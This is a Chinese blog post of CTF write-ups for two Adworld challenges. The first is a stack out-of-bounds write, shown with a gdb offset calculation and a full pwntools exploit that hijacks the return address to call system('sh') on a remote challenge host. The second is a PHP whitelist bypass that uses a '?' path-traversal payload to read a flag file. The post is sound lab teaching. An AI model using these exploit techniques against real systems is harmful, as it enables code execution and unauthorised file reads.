CTF每日一题-Day2


D2 T1 stack2

题目给了计算平均数并提供在线修改的功能

问题就处在修改上

      puts("which number to change:");
      __isoc99_scanf("%d", &v5);
      puts("new number:");
      __isoc99_scanf("%d", &v7);
      v13[v5] = v7;

发现修改对v5没有做边界检测,所以可以任意修改栈上的值

然后就是劫持eip跳到后门了

第一个坑点

一开始直接在ida上看栈布局,算偏移,

但是程序开了Canary栈保护,需要动态调试算偏移

gdb-peda$ b main
Breakpoint 1 at 0x80485de
gdb-peda$ b *0x080488F2 #main() retn处地址
Breakpoint 2 at 0x80488f2
gdb-peda$ r
Starting program: /root/codes/adworld/stack2 
[----------------------------------registers-----------------------------------]
EAX: 0xf7fb7548 --> 0xffffd3fc --> 0xffffd590 ("SHELL=/bin/bash")
EBX: 0x0 
ECX: 0xffffd360 --> 0x1 
EDX: 0xffffd384 --> 0x0 
ESI: 0xf7fb5000 --> 0x1d6d6c 
EDI: 0xf7fb5000 --> 0x1d6d6c 
EBP: 0xffffd348 --> 0x0 
ESP: 0xffffd344 --> 0xffffd360 --> 0x1 
EIP: 0x80485de (<main+14>:      sub    esp,0xa4)
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80485da <main+10>: push   ebp
   0x80485db <main+11>: mov    ebp,esp
   0x80485dd <main+13>: push   ecx
=> 0x80485de <main+14>: sub    esp,0xa4
   0x80485e4 <main+20>: mov    eax,gs:0x14
   0x80485ea <main+26>: mov    DWORD PTR [ebp-0xc],eax
   0x80485ed <main+29>: xor    eax,eax
   0x80485ef <main+31>: mov    eax,ds:0x804a040
[------------------------------------stack-------------------------------------]
0000| 0xffffd344 --> 0xffffd360 --> 0x1 
0004| 0xffffd348 --> 0x0 
0008| 0xffffd34c --> 0xf7dfc7e1 (<__libc_start_main+241>:       add    esp,0x10)
0012| 0xffffd350 --> 0xf7fb5000 --> 0x1d6d6c 
0016| 0xffffd354 --> 0xf7fb5000 --> 0x1d6d6c 
0020| 0xffffd358 --> 0x0 
0024| 0xffffd35c --> 0xf7dfc7e1 (<__libc_start_main+241>:       add    esp,0x10)
0028| 0xffffd360 --> 0x1 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x080485de in main ()
gdb-peda$ c
Continuing.
***********************************************************
*                      An easy calc                       *
*Give me your numbers and I will return to you an average *
*(0 <= x < 256)                                           *
***********************************************************
How many numbers you have:
4
Give me your numbers
1 2 3 4
1. show numbers
2. add number
3. change number
4. get average
5. exit
5
[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0x0 
ECX: 0xffffd360 --> 0x1 
EDX: 0xf7fb701c --> 0x0 
ESI: 0xf7fb5000 --> 0x1d6d6c 
EDI: 0xf7fb5000 --> 0x1d6d6c 
EBP: 0x0 
ESP: 0xffffd35c --> 0xf7dfc7e1 (<__libc_start_main+241>:        add    esp,0x10)
EIP: 0x80488f2 (<main+802>:     ret)
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80488eb <main+795>:        mov    ecx,DWORD PTR [ebp-0x4]
   0x80488ee <main+798>:        leave  
   0x80488ef <main+799>:        lea    esp,[ecx-0x4]
=> 0x80488f2 <main+802>:        ret    
   0x80488f3:   xchg   ax,ax
   0x80488f5:   xchg   ax,ax
   0x80488f7:   xchg   ax,ax
   0x80488f9:   xchg   ax,ax
[------------------------------------stack-------------------------------------]
0000| 0xffffd35c --> 0xf7dfc7e1 (<__libc_start_main+241>:       add    esp,0x10)
0004| 0xffffd360 --> 0x1 
0008| 0xffffd364 --> 0xffffd3f4 --> 0xffffd575 ("/root/codes/adworld/stack2")
0012| 0xffffd368 --> 0xffffd3fc --> 0xffffd590 ("SHELL=/bin/bash")
0016| 0xffffd36c --> 0xffffd384 --> 0x0 
0020| 0xffffd370 --> 0x1 
0024| 0xffffd374 --> 0x0 
0028| 0xffffd378 --> 0xf7fb5000 --> 0x1d6d6c 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 2, 0x080488f2 in main ()

一开始是ebp=0xffffd348

根据ida v13=ebp-0x70=0xffffd2d8

最后esp=0xffffd35c(也即return address)

offset=esp-v13=0xffffd35c-0xffffd2d8=84

第二个坑点就是hackme函数没有用。。。。

看了wp发现没有靶机上没有/bin/bash

但是可以拼接system和sh(取/bin/bash首地址+7)

Exp:

#coding = utf-8
from pwn import *
context(arch="amd64",os="linux",log_level="DEBUG")

io=remote("111.198.29.45","46367")

def write_byte(off,val):
    io.sendline("3")
    io.sendlineafter("which number to change:\n",str(off))
    io.sendlineafter("new number:\n",str(val))

def write_dword(off,val):
    write_byte(off,val & 0xff)
    write_byte(off+1,(val >> 8) & 0xff)
    write_byte(off+2,(val >> 16) & 0xff)
    write_byte(off+3,(val >> 24) & 0xff)

system_addr=0x08048450
sh_addr=0x08048980+7
offset=0x84

io.sendlineafter("How many numbers you have:\n","1")
io.sendlineafter("Give me your numbers\n","1")
io.recvuntil("5. exit\n")

write_dword(offset,system_addr)
write_dword(offset+0x4+0x4,sh_addr)

io.send("5\n")
io.interactive()

D2 T2 warm up

真warm up

$whitelist = ["source"=>"source.php","hint"=>"hint.php"];  
$_page = mb_substr(
    $page,
    0,
    mb_strpos($page . '?', '?')
  );
  if (in_array($_page, $whitelist)) {
    return true;
  }

加个?就可以利用substr绕过白名单检测了

payload=?file=hint.php?/../../../../ffffllllaaaagggg

读flag即可

题目来源:攻防世界

声明:Eki's Blog|版权所有,违者必究|如未注明,均为原创|本网站采用BY-NC-SA协议进行授权

转载:转载请注明原文链接 - CTF每日一题-Day2


A Dreamer Full of Dream